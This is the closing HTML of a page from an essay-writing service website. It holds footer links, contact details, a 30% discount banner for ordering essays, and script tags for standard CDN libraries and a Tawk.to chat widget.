col--> </div> <!--end row--> </div> <!--end container--> <div class="btn-set2 text-center mt-5 wow bounceIn"> <a href="/order" class="btn btn-success black-btn2 mt-3 mr-sm-2">Place an Order</a> <a href="javascript:void(Tawk_API.toggle())" class="btn btn-primary black-btn2 mt-3 mr-sm-2 bounce-effect"><i class="fas fa-comments"></i> Start Chat Now</a> </div> <div class="container-fluid"> <div class="row"> <div class="home-shape-bottom"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/mazing.png" alt="image" class="img-fluid mx-auto d-block lazyload"> </div> </div> <!--end row--> </div> <!-- END CONTAINER --> </section> <footer class="footer"> <div class="container"> <div class="row"> <div class="col-lg-4 col-12 mb-0 mb-md-4 pb-0 pb-md-2"> <h4 class="text-light footer-head">Why Choose Us</h4> <p class="mt-4">Thousands of students and professionals rely on us for their writing tasks to achieve their goals in academic life. Our services are offered as a fusion of quality, affordability, reliability and utmost dedication.</p> <div> <img src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/arder.png" alt=""> </div> <!--end icon--> </div> <!--end col--> <div class="col-lg-2 col-md-4 col-sm-6 mt-4 mt-sm-0 pt-2-sm-0"> <h4 class="text-light footer-head">Quick Links </h4> <ul class="list-unstyled footer-list mt-4"> <li><a href="./#home" class="text-foot"><i class="fas fa-chevron-right mr-1"></i>Home</a></li> <li><a href="./#benefits" class="text-foot"><i class="fas fa-chevron-right mr-1"></i>Benefits</a></li> <li><a href="./#areas" class="text-foot d-none d-sm-inline-block"><i class="fas fa-chevron-right mr-1"></i>Areas of Expertise</a></li> <li><a href="./#areas2" class="text-foot d-inline-block d-sm-none"><i class="fas fa-chevron-right mr-1"></i>Areas of Expertise</a></li> <li><a href="./#how-to" class="text-foot"><i class="fas fa-chevron-right mr-1"></i>Why Choose Us</a></li> <li><a href="./#service" class="text-foot"><i class="fas fa-chevron-right mr-1"></i>Services</a></li> <li><a href="./#features" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> Features</a></li> <li><a href="./#process" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> Our Process</a></li> <li><a href="./#testimonials" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> Testimonials</a></li> <li><a href="./#faqs" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> FAQs</a></li> </ul> </div> <!--end col--> <div class="col-lg-3 col-md-4 col-sm-6 mt-4 mt-sm-0 pt-2 pt-sm-0"> <h4 class="text-light footer-head d-none d-sm-block">  </h4> <ul class="list-unstyled footer-list mt-4"> <li><a href="https://assignmentresearchwriter.com" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> Home</a></li> <li><a href="https://assignmentresearchwriter.com/pricing/" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> Pricing.</a></li> <li><a href="https://assignmentresearchwriter.com/privacy-and-policy/" class="text-foot"><i class="fas fa-chevron-right mr-1"></i> Privacy and policy</a></li> </ul> </div> <!--end col--> <div class="col-lg-3 col-md-4 col-sm-6 mt-4 mt-sm-0 pt-2 pt-sm-0"> <h4 class="text-light footer-head">Connect with Us </h4> <ul class="list-unstyled footer-list mt-4"> <li><a href="mailto:Support@assignmentresearchwriter.com" class="text-foot"><i class="fas fa-envelope mr-1"></i>Support@assignmentresearchwriter.com</a></li> <li><a href="tel: +1 763 309 4299" class="text-foot btn_tell"><i class="fas fa-phone mr-1"></i> +1 763 309 4299</a></li> <li><a href="javascript:void(Tawk_API.toggle())" class="text-foot"><i class="fas fa-comments mr-1"></i>Start Live Chat</a></li> </ul> <ul class="list-unstyled payment-cards mb-0"> <li> <h4 class="text-light footer-head mt-3">Payment Options</h4> </li> <li class="list-inline-item"><img src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/primitively.png" alt="Payment methods"></li> </ul> </div> </div> </div> </footer> <!--end footer--> <hr> <footer class="footer footer-bar"> <div class="container"> <div class="row"> <div class="col-md-7 col-lg-8"> <p>Disclaimer: All Original and Custom Writing Services are solely for the purpose of your understanding and information.</p> <p class="mb-0">Copyrights © 2024 Assignment Research Writer. All Rights Reserved.</p> </div> <div class="col-md-5 col-lg-4 text-right" id="social_icons_wrap"> <p> <span class="mr-2">Follow Us |</span> <a class="sm_fb" href="Assignmentreserchwriter" target="_blank"><i class="fab fa-facebook-f"></i></a> </p> </div> </div> </div> </footer> <div id="discountBanner" class="discount-banner"> <div class="container"> <div class="discount-banner__wrapper"> <p class="discount-banner__text">Order your essay today and save <span>30%</span> with the discount code <span>Happy</span></p> <div class="button-wrap"> <a href="/order" title="Order Now" class="button-order-now">Order Now</a> </div> </div> </div> </div> <link rel='stylesheet' id='ctawidgets-css' href='https://assignmentresearchwriter.com/wp-content/plugins/cta-widgets/css/widget.css?ver=6.6.2' type='text/css' media='all' /> <style id='ctawidgets-icon-inline-css' type='text/css'> @media screen and (min-width: 768px) { .article__cta:before { background-image: url(https://assignmentresearchwriter.com/wp-content/plugins/cta-widgets/icons/oval-archive.png); background-size: contain; background-position: center right; background-repeat: no-repeat } } </style> <link rel='stylesheet' id='wpnavigationbar-css' href='https://assignmentresearchwriter.com/wp-content/plugins/wp-navigation-bar/style.css?ver=6.6.2' type='text/css' media='all' /> <style id='wpnavigationbar-css-inline-css' type='text/css'> @media only screen and (min-width: 480px) { body.with_wpnavigationbar header:first-child {margin-top:55px !important;} }.discount-banner {background-color:#007070 !important;}.discount-banner__text{color:#ffffff !important;}.discount-banner span {color:#f6a510 !important;}.discount-banner .button-order-now {background-color:#f6a510 !important;} @media only screen and (max-width: 480px) { .discount-banner { display: none; } } </style> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.10/jquery.lazy.min.js" id="lazy-js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/flatpickr/4.6.3/flatpickr.min.js" id="flatpickr-js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery-nice-select/1.1.0/js/jquery.nice-select.min.js" id="jquery-nice-select-js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/wow/1.1.2/wow.min.js" id="wow-js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/owl-carousel/1.3.2/owl.carousel.min.js" id="owl-js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/typed.js@1.1.7/dist/typed.min.js" id="typed-js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/ouibounce/0.0.11/ouibounce.min.js" id="ouibounce-js"></script> <script type="text/javascript" src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/js/main.js?ver=1.0" id="mavens-js-js"></script> <script type="text/javascript" src="https://assignmentresearchwriter.com/static/js/scripts.js" id="scripts-js"></script> <script type="text/javascript" src="https://assignmentresearchwriter.com/wp-content/plugins/floatingcontacts/js/floatingcontacts.js?ver=1.0.0" id="floatingcontacts_js-js"></script> <script type="text/javascript" src="https://assignmentresearchwriter.com/wp-content/plugins/samples/dist/bundle.js?ver=1.0.0" id="samples_js-js"></script> <!--Start of Tawk.to Script--> <script type="text/javascript"> var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.tawk.to/6354dd93b0d6371309cb0285/1gg1o32p1'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })(); </script> <!--End of Tawk.to Script--></body> </html>